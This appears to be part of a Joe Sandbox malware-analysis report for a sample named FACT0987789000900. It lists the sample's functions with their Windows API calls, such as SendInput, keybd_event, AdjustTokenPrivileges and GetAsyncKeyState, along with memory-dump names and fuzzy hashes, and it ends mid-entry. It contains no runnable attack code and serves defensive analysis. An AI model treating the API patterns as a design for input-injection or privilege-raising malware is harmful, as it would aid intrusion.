Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 45aa5c3395d9b7c129b91a347fefcb669f51b9751149d95a19b8f159ac5954d2
Instruction ID: f32f71d94b5d7a69572ee13140a5959df23f9389b2ef4db9b086679774aefced
Opcode Fuzzy Hash: 45aa5c3395d9b7c129b91a347fefcb669f51b9751149d95a19b8f159ac5954d2
Instruction Fuzzy Hash: 2501D230200208ABCB219F54DC54FBA3B66FF95325F14456AFD050B2A0C735980ADB59

Function 004FF689 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 004FF6AC
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0050E52B,?,?,?,?,?), ref: 004FF6D5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: ce3a065beff234b98e3525ffef337786b5bc94d2264d725c0abe6bda1b30a250
Instruction ID: 586b9e0e7336bb7033fa739f1ba4ccd7653093022877fd53143e8431cc32cf77
Opcode Fuzzy Hash: ce3a065beff234b98e3525ffef337786b5bc94d2264d725c0abe6bda1b30a250
Instruction Fuzzy Hash: 25F03A72410218FFEF048F85DC09AFE7FB9EF54311F14401AFA01A2160D7B5AA55EB64

Function 004DCE7A Relevance: 3.0, APIs: 2, Instructions: 30windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,004EBE6A,?,?,00000000,?), ref: 004DCEA7
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,004EBE6A,?,?,00000000,?), ref: 004DCEB9

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7c939f5e9b53898412b262a3189031a3bd2f6ca23932b02c7d7e148ac68d4258
Instruction ID: 15ebd53eb9f393053e8c57ebb22e84f0f22cf3760a7c51aa7cd25a00c7f1ed7f
Opcode Fuzzy Hash: 7c939f5e9b53898412b262a3189031a3bd2f6ca23932b02c7d7e148ac68d4258
Instruction Fuzzy Hash: EDF08275100229ABDB10ABA4DC89FEA776DBF08355F008166F919D6181D7349A44CBB5

Function 004D411C Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 004D4153
keybd_event.USER32(?,75A4C0D0,?,00000000), ref: 004D4166

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: aef28939c379fd2b23fd6fe954f4e804348fc9ddd535c357c8dfff8adc8189b6
Instruction ID: dd312f73f47b2091a785dabeabb4b10a68402efed170cf0f13209cd8fdc223aa
Opcode Fuzzy Hash: aef28939c379fd2b23fd6fe954f4e804348fc9ddd535c357c8dfff8adc8189b6
Instruction Fuzzy Hash: 57F0677480024DAFDB059FA0C809BFE7FB0EF10305F00800AF966A6292D77986169FA4

Function 004CAB84 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004CACC0), ref: 004CAB99
CloseHandle.KERNEL32(?,?,004CACC0), ref: 004CABAB

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: e2208a2ad2074405a627209da0f86a55df9498bc0fcffcda0f5e5b5c6201df9f
Instruction ID: 095b793d3dd8da26a02b6e192424fb78ea60f619585826f7f0146424fb993e4d
Opcode Fuzzy Hash: e2208a2ad2074405a627209da0f86a55df9498bc0fcffcda0f5e5b5c6201df9f
Instruction Fuzzy Hash: 38E08631000610BFE7212F55EC08DB3B7F9EF04320710C82EF85980431D7266C94DB50

Function 004FF7C3 Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 004FF7CB
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0050E4AA,?,?,?,?), ref: 004FF7F5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 917ff72bfe2f25684c795fea3e20fcc104cb42e40ace5612fa45dee6584f356e
Instruction ID: 90f06ecf0fdb96d1b00f8e6a207fab1b0313e3cdb808e24d996b447b67f02af7
Opcode Fuzzy Hash: 917ff72bfe2f25684c795fea3e20fcc104cb42e40ace5612fa45dee6584f356e
Instruction Fuzzy Hash: D9E0C230104218BBEB141F09DC0AFBE3F68EB10B50F108126FA5B980E0E7B59895E274

Function 004B81AC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,004B6DB3,-0000031A,?,?,00000001), ref: 004B81B1
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 004B81BA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: a4a2a3e1c5852057de81396d435ee28838d9b1b106916b78225eb85213102a96
Instruction ID: a05db1b9b68015dc70a8b2cb66009a85a0c2350cdfc100c6553ebca1b52de749
Opcode Fuzzy Hash: a4a2a3e1c5852057de81396d435ee28838d9b1b106916b78225eb85213102a96
Instruction Fuzzy Hash: F9B09231044608ABDB402BA1EC09B98BF78EB18652F008410F62D44061CB725414AAA2

Function 004977B0 Relevance: 2.6, APIs: 1, Instructions: 1076COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00497921

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 5f17548e4a40a1f5f61597aea0f8687d038912d9ec8aa8093be41ea291a3d8a2
Instruction ID: 183a539b661cdeb0700d0951e30e7c826d72e1d920f88023ca3497f6994a8e69
Opcode Fuzzy Hash: 5f17548e4a40a1f5f61597aea0f8687d038912d9ec8aa8093be41ea291a3d8a2
Instruction Fuzzy Hash: 44A25A74A04219CFDF24CF58C8806EDBBB1FF48314F2581AAD859AB391D7349E82DB95

Function 004A3B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON

Download Yara Rule

Strings

@, xrefs: 004A4176

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: @
API String ID: 3728558374-2766056989
Opcode ID: 3381c5e07cf3bb1c1ec2308634cbc68ae64704d12abd28389e932416e8ef5ecd
Instruction ID: 1540ec06ac4533e744c93f4d99d01c50522c89826b5bdc379559018e41198aa1
Opcode Fuzzy Hash: 3381c5e07cf3bb1c1ec2308634cbc68ae64704d12abd28389e932416e8ef5ecd
Instruction Fuzzy Hash: 1D72BD30D042099FCF10DF94C485AAEBBB5FF6A304F14805AF905AB391D778AE46CB99

Function 004BD1B9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c18b839542b4c7254d80823c5c6c908dda5c437345a551f4b53a001abbf33463
Instruction ID: a254b0506ec3f5a053f677f2fa03bb615c6afaa9dbb4bd5aa64f214399d32ae2
Opcode Fuzzy Hash: c18b839542b4c7254d80823c5c6c908dda5c437345a551f4b53a001abbf33463
Instruction Fuzzy Hash: FA324562D29F014DD7339634C922376A288EFB73D4F15D737E81AB5EAAEB28C4835114

Function 004996C0 Relevance: 2.1, APIs: 1, Instructions: 573COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: __itow__swprintf
String ID:
API String ID: 674341424-0
Opcode ID: 0afde5881cddb8ed71e7e7bc1ac094ad8e698068c369d029b533e3eece8c9caf
Instruction ID: d705a7a41ff119ae24d26cb7afff2d1e3a966a163b95497bea8be2e9241f2216
Opcode Fuzzy Hash: 0afde5881cddb8ed71e7e7bc1ac094ad8e698068c369d029b533e3eece8c9caf
Instruction Fuzzy Hash: 5D2299715083019BDB24DF18C891B6FBBE4BF95314F10492EF89A87291DB79EC45CB8A

Function 004C038E Relevance: 1.8, APIs: 1, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d130cb099019c70ffa8ae7bcbfee8fe1e1b63ffae65d5b8cd87262d1fa24568
Instruction ID: 4175473af68021aedade33eaa7e2240178d5134aff7ebdefdaa7d7a51c4f6131
Opcode Fuzzy Hash: 2d130cb099019c70ffa8ae7bcbfee8fe1e1b63ffae65d5b8cd87262d1fa24568
Instruction Fuzzy Hash: FAB1EE20D2AF414DD22396398C35336B79CAFBB2D5B91D71BFC2A74D22FB2185875180

Function 004DB6CC Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

__time64.LIBCMT ref: 004DB6DF

Part of subcall function 004B344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,004DBDC3,00000000,?,?,?,?,004DBF70,00000000,?), ref: 004B3453
Part of subcall function 004B344A: __aulldiv.LIBCMT ref: 004B3473

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Time$FileSystem__aulldiv__time64
String ID:
API String ID: 2893107130-0
Opcode ID: 3ecccfce50b2494b1947e5457e27f589addb809f5fca2bbcfb8ac76b13d96a89
Instruction ID: 3d1b1a01cb5685c623f4c011884cbf992f8be33d5238347fe34b9e1ebf0931b4
Opcode Fuzzy Hash: 3ecccfce50b2494b1947e5457e27f589addb809f5fca2bbcfb8ac76b13d96a89
Instruction Fuzzy Hash: 2921E772630610CBC719CF39C491A92B7E0EB95311B258E7EE0E5CB2C0CB38B909DB94

Function 0050044C Relevance: 1.6, APIs: 1, Instructions: 64nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

NtdllDialogWndProc_W.NTDLL(?,00000112,?,?), ref: 005004F4

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: 79626c347f43d3da18f616e8a5d626b5f9ea78ac80be4a758e1d2eef7fee3001
Instruction ID: 25fc929de9e8f367c41707ebfc6d0cc8f495c88227a0cefdcadf011992d07ece
Opcode Fuzzy Hash: 79626c347f43d3da18f616e8a5d626b5f9ea78ac80be4a758e1d2eef7fee3001
Instruction Fuzzy Hash: 15110671204615BAFF245B28CC16FBD3F14EB41B20F20871AFB129E5D2CA785D01A29D

Function 005000AC Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0050E467,?,?,?,?,00000000,?), ref: 00500127

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: b9c0eef77fab4ea91ef8ca7ddb5ddbffb35595e69dc323e006a4d3463bd3c8ba
Instruction ID: 634e3eb8597cba2e53386f5bd97d761b29111574aceb68492a03196d15430d89
Opcode Fuzzy Hash: b9c0eef77fab4ea91ef8ca7ddb5ddbffb35595e69dc323e006a4d3463bd3c8ba
Instruction Fuzzy Hash: 5101CC31A00014ABDB148F24DC4ABBE3FA2FF85325F185129F95A1B1D2C3319C21E660

Function 005000AF Relevance: 1.5, APIs: 1, Instructions: 46nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537

NtdllDialogWndProc_W.NTDLL(?,00000115,?,?,?,?,?,?,0050E467,?,?,?,?,00000000,?), ref: 00500127

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: ae5494707dc43276cca93b2276763d2ba67fe261f8390fa3f5d15c319266150c
Instruction ID: de9d156029f51c87a2efde843272839c04217422ede95d3aa672660d48d73897
Opcode Fuzzy Hash: ae5494707dc43276cca93b2276763d2ba67fe261f8390fa3f5d15c319266150c
Instruction Fuzzy Hash: 8801B171A00118ABDB149F25DC5ABFE3FA2FF85325F085129FA591B1D2C371AC20D7A0

Function 004FE9AF Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 004AB526: GetWindowLongW.USER32(?,000000EB), ref: 004AB537

CallWindowProcW.USER32(?,?,00000020,?,?), ref: 004FE9F5

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd

Similarity

API ID: Window$CallLongProc
String ID:
API String ID: 4084987330-0
Opcode ID: 3d4714d1c2dcf285249cb3b5be65b2479b4eec885ebc80087c9f38167681d472
Instruction ID: 7a06f8b23e4051293b78c5c222f156cd3b875cd49f764121ffba9bfffbc53662
Opcode Fuzzy Hash: 3d4714d1c2dcf285249cb3b5be65b2479b4eec885ebc80087c9f38167681d472
Instruction Fuzzy Hash: 06F03C7110010CAFCB159F95EC10DB93BA6FB18326B048116FE155B6B1C77A9861EBA4

Function 004FEC7C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 004AB34E: GetWindowLongW.USER32(?,000000EB), ref: 004AB35F

Part of subcall function 004AB63C: GetCursorPos.USER32(000000FF), ref: 004AB64F
Part of subcall function 004AB63C: ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000001), ref: 004AB691
Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000002), ref: 004AB69F

NtdllDialogWndProc_W.NTDLL(?,00000204,?,?,00000001,?,?,?,0050E514,?,?,?,?,?,00000001,?), ref: 004FECCA

Memory Dump Source

Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true

Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
